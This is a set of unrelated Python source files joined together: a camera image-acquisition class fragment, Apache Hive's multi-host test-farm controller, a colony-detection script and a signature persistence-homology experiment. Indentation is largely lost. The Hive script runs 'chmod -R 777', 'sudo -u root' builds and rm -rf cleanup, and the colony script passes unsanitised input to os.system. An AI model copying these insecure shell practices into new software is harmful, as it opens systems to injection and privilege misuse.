args=(lambda : self._stop_cont_acq,
lambda : self._save_images,
lambda : self._folder_name,))
self.thread_cont.start()
def stop_cont_acq(self):
self._stop_cont_acq = True
print("stop sent")
self.thread_cont.join()
def save_images(self, folder_name):
self._save_images = True
self._folder_name = folder_name
print("save sent")
def _cont_acq(self, stop, save_images, folder_name):
self.cam.StartGrabbing()
t_grab = time.time()
nbr_imgs_saved = 0
while not stop():
with self.cam.RetrieveResult(2000) as result:
self.counter = self.counter + 1
#print("putting")
self.queue.put(result.Array)
print("bc queue size: {}".format(self.queue.qsize()))
# Calling AttachGrabResultBuffer creates another reference to the
# grab result buffer. This prevents the buffer's reuse for grabbing.
#import pdb;pdb.set_trace()
#self.img.AttachGrabResultBuffer(result)
# In order to make it possible to reuse the grab result for grabbing
# again, we have to release the image (effectively emptying the
# image object).
if save_images():
                    #import pdb;pdb.set_trace()
print("save images")
#self.img.AttachGrabResultBuffer(result)
nbr_imgs_saved += 1
filename = "%d.tiff" % (self.counter % 9)
#self.img.Save(pylon.ImageFileFormat_Tiff , filename)
imageio.imwrite(filename, result.Array)
if nbr_imgs_saved == self.nbr_im:
self._save_images = False
#move images
#check if previous move images is done, otherwise throw error
if self.thread_move:
                            if self.thread_move.is_alive():
                                raise BufferError("The last batch of images is still being moved; lower the frame rate or use a faster hard drive.")
self.thread_move = threading.Thread(target=self._move_images, args=(folder_name(),))
self.thread_move.start()
#if self.thread_move:
# if self.thread_move.isAlive():
# print("Moving thread active!")
# else:
#print("not active")
#print(self.counter % 9, end = ',')
#self.img.Release()
#if i % 10 == 0:
#print(i)
#print("counter at %d" % self.counter)
#print("mod %d" % (self.counter % 9))
# Printing every 10 exposures
self.cam.StopGrabbing()
print("Continuous acquisition stopped after", time.time() - t_grab, "seconds")
def _move_images(self, folder_name):
t_move = time.time()
#timestr = time.strftime("%Y%m%d-%H%M%S/")
#coord_str = "led_{}_stage_{}_sample_{}/".format(coords[0], coords[1], coords[2])
os.mkdir(self.folder_path + folder_name)
for i in range(self.nbr_im):
print("moving {}".format(i))
#shutil.move("{}.tiff".format((self.counter + i) % 9), self.folder_path + coord_str + "{}.tiff".format((self.counter + i) % 9))
shutil.move("{}.tiff".format(i), self.folder_path + folder_name + "/{}.tiff".format(i))
print("time of moving 9 images: ", time.time() - t_move)
def move_images(self, coords):
t_move = time.time()
#timestr = time.strftime("%Y%m%d-%H%M%S/")
coord_str = "led_{}_stage_{}_sample_{}/".format(coords[0], coords[1], coords[2])
os.mkdir(self.folder_path + coord_str)
for i in range(self.nbr_im):
print("moving {}".format((self.counter + i) % 9))
print("counter is {}".format(self.counter))
shutil.move("{}.tiff".format((self.counter + i) % 9), self.folder_path + coord_str + "{}.tiff".format((self.counter + i) % 9))
print("time of moving 9 images: ", time.time() - t_move)
|
hivetest.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import time
from threading import Thread
import os.path
import collections
import re
import os
import Report
import config
# WARNING
#
# If you are editing this code, please be aware that commands passed to `run`
# should not use single quotes, this will break and end badly as the final
# command looks like `ssh 'host' 'some command - single quote will break it'`.
# Also please be aware that `run` uses `.format` to change `{host}` in commands
# into the actual host name it is running on, so running `.format` yourself on
# strings that contain `{host}` (for example anything including `host_code_path`)
# will not work.
#
# Also this code assumes master_base_path is available to all testing machines
# and is mounted in the same place on all of them.
#
# Getting rid of these restrictions without making the code much more complicated
# is very welcome.
# This is configured in user configuration file.
local = None
qfile_set = None
other_set = None
remote_set = None
all_set = None
master_base_path = None
host_base_path = None
runtest_dir = os.getcwd()
# End of user-configured settings.
ant_path = None
arc_path = None
phutil_path = None
code_path = None
report_path = None
host_code_path = None
ivy_path = None
def read_conf(config_file):
global local, qfile_set, other_set, remote_set, all_set
global master_base_path, host_base_path
global ant_path, arc_path, phutil_path, code_path, report_path, host_code_path, ivy_path
if config_file is not None:
config.load(config_file)
else:
config.load()
local = config.local
qfile_set = config.qfile_set
other_set = config.other_set
remote_set = config.remote_set
all_set = config.all_set
master_base_path = config.master_base_path
host_base_path = config.host_base_path
if 'HIVE_PTEST_SUFFIX' in os.environ:
suffix = os.environ['HIVE_PTEST_SUFFIX']
master_base_path += '-' + suffix
host_base_path += '-' + suffix
ant_path = master_base_path + '/apache-ant-1.8.4'
arc_path = master_base_path + '/arcanist'
phutil_path = master_base_path + '/libphutil'
code_path = master_base_path + '/trunk'
report_path = master_base_path + '/report/' + time.strftime('%m.%d.%Y_%H:%M:%S')
host_code_path = host_base_path + '/trunk-{host}'
ivy_path = master_base_path + '/.ivy2'
# Setup of needed environmental variables and paths
# Proxy
if args.http_proxy is not None:
all_set.export('http_proxy', args.http_proxy + ':' + args.http_proxy_port)
all_set.export('https_proxy', args.http_proxy + ':' + args.http_proxy_port)
all_set.export('ANT_OPTS', get_ant_opts_proxy())
# Ant
all_set.export('ANT_HOME', ant_path)
all_set.add_path(ant_path + '/bin')
# Arcanist
all_set.add_path(arc_path + '/bin')
# Java
all_set.export('JAVA_HOME', config.java_home)
all_set.add_path(config.java_home + '/bin')
# Hive
remote_set.export('HIVE_HOME', host_code_path + '/build/dist')
remote_set.add_path(host_code_path + '/build/dist/bin')
def get_ant_opts_proxy():
cmd = ' -Dhttp.proxyHost=' + args.http_proxy
cmd += ' -Dhttp.proxyPort=' + args.http_proxy_port
cmd += ' -Dhttps.proxyHost=' + args.http_proxy
cmd += ' -Dhttps.proxyPort=' + args.http_proxy_port
return cmd
def get_ant():
# Gets Ant 1.8.4 from one of Apache mirrors.
print('\n-- Installing Ant 1.8.4\n')
if local.run('test -d "{0}"'.format(ant_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(master_base_path))
local.cd(master_base_path)
local.run('curl "http://apache.osuosl.org//ant/binaries/apache-ant-1.8.4-bin.tar.gz" | tar xz')
else:
print('\n Ant 1.8.4 already installed\n')
def get_arc():
# Gets latest Arcanist and libphtuil from their Git repositories.
print('\n-- Updating Arcanist installation\n')
if local.run('test -d "{0}"'.format(arc_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(arc_path)))
local.run('git clone https://github.com/facebook/arcanist.git "{0}"'
.format(arc_path))
if local.run('test -d "{0}"'.format(phutil_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(phutil_path)))
local.run('git clone https://github.com/facebook/libphutil.git "{0}"'
.format(phutil_path))
local.cd(arc_path)
local.run('git pull https://github.com/facebook/arcanist.git')
local.cd(phutil_path)
local.run('git pull https://github.com/facebook/libphutil.git')
def get_clean_hive():
# Gets latest Hive from Apache Git repository and cleans the repository
# (undo of any changes and removal of all generated files). Also runs
# `arc-setup` so the repo is ready to be used.
print('\n-- Updating Hive repo\n')
local.cd(code_path)
if local.run('test -d "{0}"'.format(code_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(code_path)))
local.run('git clone http://git.apache.org/hive.git "{0}"'.format(code_path))
else:
        # Clean the repo and check out the latest revision
local.run('git reset --hard HEAD')
local.run('git clean -dffx')
local.run('git pull')
local.run('ant arc-setup')
def copy_local_hive():
# Copy local repo to the destination path instead of using git clone
if local.run('test -d "{0}"'.format(code_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(code_path)))
local.run('rm -rf "{0}"'.format(code_path), warn_only = True)
local.run('mkdir -p "{0}"'.format(code_path))
local.run('echo "{0}"'.format(runtest_dir))
local.cd(runtest_dir)
local.run('cp -rf * "{0}"'.format(code_path))
local.cd(code_path)
local.run('ant arc-setup')
def prepare_for_reports():
# Generates directories for test reports. All test nodes will copy results
# to this directories.
print('\n-- Creating a directory for JUnit reports\n')
# Remove previous reports that might be there.
local.run('rm -rf "{0}"'.format(report_path), warn_only = True)
local.run('mkdir -p "{0}/logs"'.format(report_path))
local.run('mkdir -p "{0}/out/clientpositive"'.format(report_path))
local.run('mkdir -p "{0}/out/clientnegative"'.format(report_path))
def patch_hive(patches = [], revision = None):
# Applies given patches to the Hive repo. Revision means a Differential
# revision, patches list is a list of paths to patches on local file system.
#
# Allowing multiple revisions and patches would complicate things a little
# (order of applied patches should be preserved, but argparse will split
# them into two lists) so only multiple local patches are allowed.
# Shouldn't be a big problem as you can use `arc export` to get the patches
# locally.
local.cd(code_path)
if revision is not None:
print('\n-- Patching Hive repo using a Differential revision\n')
revision = revision.upper()
if not revision.startswith('D'):
revision = 'D' + revision
local.run('arc patch "{0}"'.format(revision))
if patches:
print('\n-- Patching Hive repo using a patch from local file system\n')
for patch in patches:
local.run('patch -rf -p0 < "{0}"'.format(patch))
def build_hive():
print('\n-- Building Hive\n')
local.cd(code_path)
cmd = 'ant -Divy.default.ivy.user.dir={0} '.format(ivy_path)
if args.very_clean:
cmd += 'very-clean '
else:
cmd += 'clean '
cmd += 'package'
local.run(cmd)
def propagate_hive():
# Expects master_base_path to be available on all test nodes in the same
# place (for example using NFS).
print('\n-- Propagating Hive repo to all hosts\n')
print(host_code_path)
print(code_path)
remote_set.run('rm -rf "{0}"'.format(host_code_path))
remote_set.run('mkdir -p "{0}"'.format(host_code_path))
remote_set.run('cp -r "{0}/*" "{1}"'.format(
code_path, host_code_path))
# It should avoid issues with 'ivy publish' exceptions during testing phase.
remote_set.run('cp -r "{0}" "{1}"'.format(ivy_path, host_code_path))
def segment_tests(path):
# Removes `.q` files that should not be run on this host. The huge shell
    # command is slow (not really surprising considering the amount of forking it
    # has to do); you are welcome to make it better =).
local.cd(code_path + path)
tests = local.run('ls -1', quiet = True, abandon_output = False).strip().split('\n')
qfile_set.cd(host_code_path + path)
cmd = []
i = 0
for test in tests:
host = qfile_set.conn[i].hostname
cmd.append('if [[ "{host}" != "' + host + '" ]]; then rm -f "' + test + '"; fi')
i = (i + 1) % len(qfile_set)
cmd = ' && '.join(cmd)
# The command is huge and printing it out is not very useful, using wabbit
# hunting mode.
qfile_set.run(cmd, vewy_quiet = True)
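# A minimal sketch of the round-robin assignment performed by segment_tests
# (hypothetical hosts and test names; no shell command involved): each `.q`
# file ends up owned by exactly one host.
def _demo_round_robin(tests, hosts):
    owner = {}
    for i, test in enumerate(tests):
        owner[test] = hosts[i % len(hosts)]
    return owner
# _demo_round_robin(['join1.q', 'join2.q', 'union.q'], ['host-0', 'host-1'])
# -> {'join1.q': 'host-0', 'join2.q': 'host-1', 'union.q': 'host-0'}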
def prepare_tests():
print('\n-- Preparing test sets on all hosts\n')
segment_tests('/ql/src/test/queries/clientpositive')
segment_tests('/ql/src/test/queries/clientnegative')
def collect_log(name):
# Moves JUnit log to the global logs directory.
#
# This has the same restriction on master_base_path as propagate_hive.
new_name = name.split('.')
new_name[-2] += '-{host}'
new_name = '.'.join(new_name)
qfile_set.cd(host_code_path + '/build/ql/test')
# If tests failed there may be no file, so warn only if `cp` is having
# problems.
qfile_set.run(
'cp "' + name + '" "' + report_path + '/logs/' + new_name + '" || ' +
'touch "' + report_path + '/logs/{host}-' + name + '.fail"'
)
# Get the hive.log too.
qfile_set.cd(host_code_path + '/build/ql/tmp')
qfile_set.run('cp "hive.log" "' + report_path + '/logs/hive-{host}-' + name + '.log"',
warn_only = True)
def collect_out(name, desc_name):
# Moves `.out` file (test output) to the global logs directory.
#
# This has the same restriction on master_base_path as propagate_hive.
qfile_set.cd(host_code_path + '/' + name)
# Warn only if no files are found.
qfile_set.run('mkdir -p "' + report_path + '/' + desc_name + '/out/' + '"', warn_only = True)
qfile_set.run('cp * "' + report_path + '/' + desc_name + '/out/' + '"', warn_only = True)
def run_tests():
# Runs TestCliDriver and TestNegativeCliDriver testcases.
print('\n-- Running .q file tests on all hosts\n')
# Using `quiet` because output of `ant test` is not very useful when we are
# running on many hosts and it all gets mixed up. In case of an error
# you'll get last lines generated by `ant test` anyway (might be totally
# irrelevant if one of the first tests fails and Ant reports a failure after
# running all the other test, fortunately JUnit report saves the Ant output
# if you need it for some reason).
remote_ivy_path = '$(pwd)/.ivy2'
qfile_set.cd(host_code_path)
qfile_set.run('ant -Divy.default.ivy.user.dir={0} -Dtestcase=TestCliDriver test'.format(remote_ivy_path), quiet = True, warn_only = True)
collect_log('TEST-org.apache.hadoop.hive.cli.TestCliDriver.xml')
collect_out('build/ql/test/logs/clientpositive', 'TestCliDriver')
qfile_set.cd(host_code_path)
qfile_set.run('ant -Divy.default.ivy.user.dir={0} -Dtestcase=TestNegativeCliDriver test'.format(remote_ivy_path), quiet = True, warn_only = True)
collect_log('TEST-org.apache.hadoop.hive.cli.TestNegativeCliDriver.xml')
collect_out('build/ql/test/logs/clientnegative', 'TestNegativeCliDriver')
def run_other_tests():
    # Runs all the other tests that run_tests doesn't run.
def get_other_list():
local.cd(code_path)
# Generate test classes in build.
local.run('ant -Dtestcase=nothing test')
if (args.singlehost):
tests = local.run(' | '.join([
'find build/*/test/classes -name "Test*.class"',
'sed -e "s:[^/]*/::g"',
'grep -v TestSerDe.class',
'grep -v TestHiveMetaStore.class',
'grep -v TestCliDriver.class',
'grep -v TestNegativeCliDriver.class',
'grep -v ".*\$.*\.class"',
'sed -e "s:\.class::"'
]), abandon_output = False)
return tests.split()
else:
tests = local.run(' | '.join([
'find build/*/test/classes -name "Test*.class"',
'sed -e "s:[^/]*/::g"',
'grep -v TestSerDe.class',
'grep -v TestHiveMetaStore.class',
'grep -v TestCliDriver.class',
'grep -v TestNegativeCliDriver.class',
'grep -v ".*\$.*\.class"',
'grep -v TestSetUGIOnBothClientServer.class',
'grep -v TestSetUGIOnOnlyClient.class',
'grep -v TestSetUGIOnOnlyServer.class',
'grep -v TestRemoteHiveMetaStore',
'grep -v TestEmbeddedHiveMetaStore',
'sed -e "s:\.class::"'
]), abandon_output = False)
return tests.split()
def segment_other():
other_set.run('mkdir -p ' + report_path + '/TestContribCliDriver', warn_only = True)
other_set.run('mkdir -p ' + report_path + '/TestContribCliDriver/positive', warn_only = True)
other_set.run('mkdir -p ' + report_path + '/TestContribCliDriver/negative', warn_only = True)
other_set.run('mkdir -p ' + report_path + '/TestHBaseCliDriver', warn_only = True)
# Split all test cases between hosts.
def get_command(test):
return '; '.join([
'ant -Divy.default.ivy.user.dir=$(pwd)/.ivy2 -Dtestcase=' + test + ' test',
'cp "`find . -name "TEST-*.xml"`" "' + report_path + '/logs/" || ' +
'touch "' + report_path + '/logs/{host}-' + test + '.fail"',
'cp "build/ql/tmp/hive.log" "' + report_path + '/logs/hive-{host}-' + test + '.log"',
'cp "build/contrib/test/logs/contribclientnegative/*" "' + report_path + '/TestContribCliDriver/negative 2>/dev/null"',
'cp "build/contrib/test/logs/contribclientpositive/*" "' + report_path + '/TestContribCliDriver/positive 2>/dev/null"',
'cp "build/hbase-handler/test/logs/hbase-handler/*" "' + report_path + '/TestHBaseCliDriver/ 2>/dev/null"'
])
cmd = []
i = 0
for test in get_other_list():
# Special case, don't run minimr tests in parallel. They will run
# on the first host, and no other tests will run there (unless we
# have a single host).
#
# TODO: Real fix would be to allow parallel runs of minimr tests.
if len(other_set) > 1:
if re.match('.*minimr.*', test.lower()):
host = other_set.conn[0].hostname
else:
i = (i + 1) % len(other_set)
if i == 0:
i = 1
host = other_set.conn[i].hostname
else:
# We are running on single host.
host = other_set.conn[0].hostname
cmd.append(
'if [[ "{host}" == "' + host + '" ]]; then ' +
get_command(test) +
'; fi'
)
return ' ; '.join(cmd)
command = segment_other()
other_set.cd(host_code_path)
# See comment about quiet option in run_tests.
other_set.run(command, quiet = True, warn_only = True)
def generate_report(one_file_report = False):
# Uses `Report.py` to create a HTML report.
print('\n-- Generating a test report\n')
local.run('cp "' + master_base_path + '/templogs/* " "'+ report_path + '/logs/" ', warn_only = True)
# Call format to remove '{{' and '}}'.
path = os.path.expandvars(report_path.format())
CmdArgs = collections.namedtuple('CmdArgs', ['one_file', 'log_dir', 'report_dir'])
args = CmdArgs(
one_file = one_file_report,
log_dir = '{0}/logs'.format(path),
report_dir = path
)
Report.make_report(args)
print('\n-- Test report has been generated and is available here:')
print('-- "{0}/report.html"'.format(path))
print()
def stop_tests():
# Brutally stops tests on all hosts, something more subtle would be nice and
# would allow the same user to run this script multiple times
# simultaneously.
print('\n-- Stopping tests on all hosts\n')
remote_set.run('killall -9 java', warn_only = True)
def remove_code():
# Running this only on one connection per host so there are no conflicts
# between several `rm` calls. This removes all repositories, it would have
# to be changed if we were to allow multiple simultaneous runs of this
# script.
print('\n-- Removing Hive code from all hosts\n')
# We could remove only `host_code_path`, but then we would have abandoned
# directories after lowering number of processes running on one host.
cmd = 'rm -rf "' + host_base_path + '"'
cmd = 'if [[ `echo "{host}" | grep -q -- "-0$"; echo "$?"` -eq "0" ]]; then ' + \
cmd + '; fi'
remote_set.run(cmd)
def overwrite_results():
# Copy generated `.q.out` files to master repo.
local.cd(code_path)
expanded_path = local.run('pwd', abandon_output = False)
print('\n-- Copying generated `.q.out` files to master repository: ' +
expanded_path)
for name in ['clientpositive', 'clientnegative']:
local.cd(report_path + '/out/' + name)
# Don't panic if no files are found.
local.run('cp * "' + code_path + '/ql/src/test/results/' + name + '"',
warn_only = True)
def save_svn_info():
if args.svn_info:
local.cd(master_base_path + '/trunk')
local.run('git show --summary > "{0}"'.format(report_path + '/svn-info'))
def save_patch():
if args.save_patch:
local.cd(code_path)
local.run('git add --all')
local.run('git diff --no-prefix HEAD > "{0}"'.format(report_path + '/patch'))
# -- Tasks that can be called from command line start here.
def cmd_prepare(patches = [], revision = None):
get_ant()
get_arc()
if (args.copylocal):
copy_local_hive()
else :
get_clean_hive()
patch_hive(patches, revision)
build_hive()
propagate_hive()
prepare_tests()
def cmd_run_tests(one_file_report = False):
prepare_for_reports()
save_svn_info()
save_patch()
t = Thread(target = run_other_tests)
t.start()
run_tests()
t.join()
if args.overwrite:
overwrite_results()
generate_report(one_file_report)
def cmd_test(patches = [], revision = None, one_file_report = False):
cmd_prepare(patches, revision)
    if not args.singlehost:
        local.cd(master_base_path + '/trunk')
        local.run('chmod -R 777 *')
local.run('rm -rf "' + master_base_path + '/templogs/"')
local.run('mkdir -p "' + master_base_path + '/templogs/"')
tests = ['TestRemoteHiveMetaStore','TestEmbeddedHiveMetaStore','TestSetUGIOnBothClientServer','TestSetUGIOnOnlyClient','TestSetUGIOnOnlyServer']
for test in tests:
local.run('sudo -u root ant -Divy.default.ivy.user.dir={0} '.format(ivy_path) + ' -Dtestcase=' + test + ' test')
local.run('cp "`find . -name "TEST-*.xml"`" "' + master_base_path + '/templogs/"')
cmd_run_tests(one_file_report)
def cmd_stop():
stop_tests()
def cmd_remove():
remove_code()
parser = argparse.ArgumentParser(description =
'Hive test farm controller.')
parser.add_argument('--config', dest = 'config',
help = 'Path to configuration file')
parser.add_argument('--prepare', action = 'store_true', dest = 'prepare',
help = 'Builds Hive and propagates it to all test machines')
parser.add_argument('--run-tests', action = 'store_true', dest = 'run_tests',
help = 'Runs tests on all test machines')
parser.add_argument('--test', action = 'store_true', dest = 'test',
help = 'Same as running `prepare` and then `run-tests`')
parser.add_argument('--report-name', dest = 'report_name',
help = 'Store report and logs directory called `REPORT_NAME`')
parser.add_argument('--stop', action = 'store_true', dest = 'stop',
help = 'Kill misbehaving tests on all machines')
parser.add_argument('--remove', action = 'store_true', dest = 'remove',
help = 'Remove Hive trunk copies from test machines')
parser.add_argument('--revision', dest = 'revision',
help = 'Differential revision to test')
parser.add_argument('--patch', dest = 'patch', nargs = '*',
help = 'Patches from local file system to test')
parser.add_argument('--one-file-report', dest = 'one_file_report',
action = 'store_true',
help = 'Generate one (huge) report file instead of multiple small ones')
parser.add_argument('--overwrite', dest = 'overwrite', action = 'store_true',
help = 'Overwrite result files in master repo')
parser.add_argument('--copylocal', dest = 'copylocal', action = 'store_true',
help = 'Copy local repo instead of using git clone and git hub')
parser.add_argument('--singlehost', dest = 'singlehost', action = 'store_true',
                    help = "Only run the tests on a single host. It is the user's "
                           'responsibility to make sure that the conf. file does not '
                           'contain multiple hosts; the script does not do any validation. '
                           'When --singlehost is set, the script should not be run using sudo.')
parser.add_argument('--very-clean', action = 'store_true', dest = 'very_clean',
help = 'Build hive with `very-clean` option')
parser.add_argument('--svn-info', dest = 'svn_info', action = 'store_true',
help = 'Save result of `svn info` into ${report_path}/svn-info')
parser.add_argument('--save-patch', dest = 'save_patch', action = 'store_true',
help = 'Save applied patch into ${report_path}/patch')
parser.add_argument('--http-proxy', dest = 'http_proxy',
help = 'Proxy host')
parser.add_argument('--http-proxy-port', dest = 'http_proxy_port',
help = 'Proxy port')
args = parser.parse_args()
read_conf(args.config)
if args.report_name:
report_path = '/'.join(report_path.split('/')[:-1] + [args.report_name])
if args.prepare:
cmd_prepare(args.patch, args.revision)
elif args.run_tests:
cmd_run_tests(args.one_file_report)
elif args.test:
cmd_test(args.patch, args.revision, args.one_file_report)
elif args.stop:
cmd_stop()
elif args.remove:
cmd_remove()
else:
parser.print_help()
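# Typical invocations (the config path, patch file and revision below are hypothetical):
#
#   ./hivetest.py --config my-farm.conf --prepare --patch HIVE-1234.patch
#   ./hivetest.py --config my-farm.conf --run-tests --one-file-report
#   ./hivetest.py --config my-farm.conf --test --revision D42 --overwrite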
|
01.colony_detection.py
|
#!/usr/bin/env python
import imaging_picking_function as ipf
import time
import os
import sys
import threading
import argparse
def main():
parser = argparse.ArgumentParser(description = "Program of colony contour detection and segmentation. See details in https://github.com/hym0405/CAMII")
parser.add_argument("-c", "--config", type = str,
help="Configure file of parameters for general colony segmentation and filtering")
parser.add_argument("-i", "--input", type = str,
help="Input folder containing raw images of plates, both trans-illuminated and epi-illuminated. A file named \"image_processed.txt\" will be written to the folder after processing")
parser.add_argument("-o", "--output", type = str,
help="Output folder. The folder will be created if not exists")
args = parser.parse_args()
configure_path = args.config
input_dir = args.input
output_dir = args.output
configure_pool = ipf.readConfigureFile(configure_path)
ipf.modifyOSconfigure(configure_pool)
total_image, image_label_list, image_trans_list, image_epi_list = ipf.readFileList(input_dir)
globalOutput = ipf.globalOutputObject(total_image)
threadPool_fun0 = []
for i in range(total_image):
tmpThread = threading.Thread(target = ipf.multi_fun0_detectColonySingleImage, args = (image_trans_list[i], image_epi_list[i], image_label_list[i], configure_pool, globalOutput, i))
threadPool_fun0.append(tmpThread)
for i in range(total_image):
threadPool_fun0[i].start()
for i in range(total_image):
threadPool_fun0[i].join()
for i in range(total_image):
tmpFlag = ipf.fun1_runPlateQualityControl(globalOutput.image_trans_corrected[i], globalOutput.image_epi_corrected[i], globalOutput.all_contours[i],
globalOutput.all_metadata[i], globalOutput.image_label[i], configure_pool)
globalOutput.plateQC_flag[i] = tmpFlag
f = open(input_dir + "/image_processed.txt", "a")
for e in image_label_list:
f.writelines([e + os.linesep])
f.close()
ipf.modifyOutputObject_colonyDetection(globalOutput, total_image, configure_pool)
if not os.path.isdir(output_dir):
os.system("mkdir -p " + output_dir)
ipf.saveOutputs_colonyDetection(globalOutput, total_image, configure_pool, output_dir)
if __name__ == "__main__":
main()
|
exp_signatures.py
|
import os
import numpy as np
import random as rand
import pylab as py
import matplotlib.pyplot as plt
import scipy.interpolate
import gudhi as gd
import ot
from matplotlib import cm
from lib import helper as hp
from lib.tda import sim_homology
from scipy.interpolate import Rbf, interp1d, interp2d
from typing import List, Set, Dict, Tuple, Optional
from multiprocessing import Process
from scipy.spatial.distance import *
from scipy.stats import *
def top_nat_neighbors(
path: str = "",
array: np.ndarray = np.empty(1),
columns: int = 88
) -> np.ndarray:
"""
Nearest neighbor interpolation.
Returns the original data with augmented nearest neighbors.
:param path: Path to the desired CSV-file.
:param column: Columns to be processed, beginning from the first.
:return:
"""
try:
if len(path) > 0:
data = hp.read_data(path, columns)
else:
data = array
except ValueError:
print("Oops! That was no valid number. Try again ...")
x, y = np.empty(0), np.empty(0)
for i in data:
if np.isfinite(i[0]) and np.isfinite(i[1]):
x = np.append(x, i[0])
y = np.append(y, i[1])
xx = np.linspace(np.min(x), np.max(x), len(x))
f = interp1d(x, y, kind="nearest")
new_data = []
for i in range(0, len(xx)):
new_data.append([xx[i], f(xx[i])])
new_data.append([x[i], y[i]])
return np.array(new_data)
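def _demo_top_nat_neighbors():
    """
    A minimal sketch on synthetic 2-D points (not MOBISIG data): the returned
    array contains both the original samples and their nearest-neighbor
    interpolated counterparts.
    """
    demo_points = np.array([[0.0, 0.0], [1.0, 2.0], [2.0, 1.0], [3.0, 3.0]])
    augmented = top_nat_neighbors(array=demo_points, columns=2)
    print(augmented.shape)  # (8, 2): one interpolated point per original sample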
def proc_signatures(dir: str, delimiter: str = ",", iterations: int = 5):
"""
Processes the experiment for the signature dataset.
    Insert the directory of the MOBISIG dataset: https://ms.sapientia.ro/~manyi/mobisig.html.
    :param dir: Path to the directory.
    :param delimiter: Delimiter used to save the CSV file.
    :param iterations: Number of interpolation iterations applied per file.
"""
subdirectories = os.listdir(dir)
for user_folder in subdirectories:
if "USER" in user_folder:
path = os.path.abspath(dir + "/" + user_folder)
filepaths = os.listdir(path)
for file in filepaths:
temp_data = top_nat_neighbors(
path=dir + "/" + user_folder + "/" + file, columns=2
)
for j in range(0, iterations):
temp_data = top_nat_neighbors(array=temp_data, columns=2)
np.savetxt(
dir
+ "/"
+ "natneighbor"
+ "/"
+ user_folder
+ "/"
+ "it_"
+ str(j)
+ "_"
+ file,
temp_data,
delimiter=delimiter,
)
def create_persistence_distance_file(
orig_path: str,
interpol_path: str,
savefile: bool = True,
distance_type: ["wasserstein", "bottleneck"] = "wasserstein",
filtration: ["alpha", "rips", "witness"] = "rips",
amount_of_files: int = 100
) -> np.ndarray:
"""
    Creates a persistence-distance comparison from two directories of correspondingly named CSV-files.
    This code relies on the naming of the directories.
    The structure should be: MOBISIG/USERX/file.csv and MOBISIG_natneighbor/USERX/file.csv for a good naming of the .csv rows.
    :param orig_path: Path to the original MOBISIG files.
    :param interpol_path: Path to the interpolated MOBISIG files.
    :param savefile: Whether to save the computed distances into a file or not (npy-format).
    :param distance_type: Either "wasserstein" or "bottleneck".
    :param filtration: Filtration to use: "alpha", "rips" or "witness".
    :param amount_of_files: Number of files to be processed.
    :return: np.ndarray with the computed distances.
"""
def diff(first, second):
"""
Computes the difference of two list objects.
:param first: First list.
:param second: Second list.
:return: List difference.
"""
second = set(second)
return [item for item in first if item not in second]
original_data, interpolated_data, files_to_ignore = [], [], []
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
files_to_ignore.append(os.path.join(dirpath, filename))
break
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
original_data.append(os.path.join(dirpath, filename))
for dirpath, dirnames, filenames in os.walk(interpol_path):
for filename in filenames:
interpolated_data.append(os.path.join(dirpath, filename))
original_data = diff(original_data, files_to_ignore)
interpolated_data = diff(interpolated_data, files_to_ignore)
for i in original_data:
matching = [s for s in interpolated_data if i[20:] in s]
matching.sort()
for j in matching:
distance = sim_homology.persistence_distance(i, j, filtration=filtration, type=distance_type)
with open("results/" + filtration + "_" + distance_type + ".csv", "a") as fd:
fd.write(
i[20 : len(i) - 4]
+ ","
+ j[32 : len(j) - 4]
+ ","
+ str(distance)
+ "\n"
)
print(
"File with name "
+ j
+ " has been compared to "
+ i
+ ". The " + distance_type + "distance is "
+ str(distance)
+ "."
)
def compute_mean_distance(path1, path2):
def diff(first, second):
"""
Computes the difference of two list objects.
:param first: First list.
:param second: Second list.
:return: List difference.
"""
second = set(second)
return [item for item in first if item not in second]
original_data, interpolated_data, files_to_ignore = [], [], []
for dirpath, dirnames, filenames in os.walk(path1):
for filename in filenames:
files_to_ignore.append(os.path.join(dirpath, filename))
break
for dirpath, dirnames, filenames in os.walk(path1):
for filename in filenames:
original_data.append(os.path.join(dirpath, filename))
for dirpath, dirnames, filenames in os.walk(path2):
for filename in filenames:
interpolated_data.append(os.path.join(dirpath, filename))
original_data = diff(original_data, files_to_ignore)
interpolated_data = diff(interpolated_data, files_to_ignore)
for i in range(0, len(original_data)):
for j in range(0, len(original_data)):
data1 = np.genfromtxt(original_data[i], delimiter=",")
data2 = np.genfromtxt(interpolated_data[j], delimiter=",")
            # Flatten the arrays and drop NaN entries before computing statistics.
            data1 = data1[~np.isnan(data1)].flatten()
            data2 = data2[~np.isnan(data2)].flatten()
mean1 = np.mean(data1)
mean2 = np.mean(data2)
std1 = np.std(data1)
std2 = np.std(data2)
varia1 = variation(data1)
varia2 = variation(data2)
w1 = wasserstein_distance(data1, data2)
with open("results/measurement_it.csv", "a") as fd:
fd.write(
original_data[i][20 : len(original_data[i]) - 4]
+ ","
+ interpolated_data[j][32 : len(interpolated_data[j]) - 4]
+ ","
+ str(mean1)
+ ","
+ str(mean2)
+ ","
+ str(std1)
+ ","
+ str(std2)
+ ","
+ str(varia1)
+ ","
+ str(varia2)
+ ","
+ str(w1)
+ "\n"
)
def run_in_parallel(*fns):
"""
Runs several functions in parallel.
:param fns: Several functions.
:return: A nice message.
"""
proc = []
for fn in fns:
p = Process(target=fn)
p.start()
proc.append(p)
for p in proc:
p.join()
return print("Processing finished!")
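# A minimal sketch of calling run_in_parallel with deferred calls: wrapping the
# calls in functools.partial keeps them from executing before the worker
# processes start (the MOBISIG paths are the same hypothetical ones used in the
# disabled block below).
#
# from functools import partial
# run_in_parallel(
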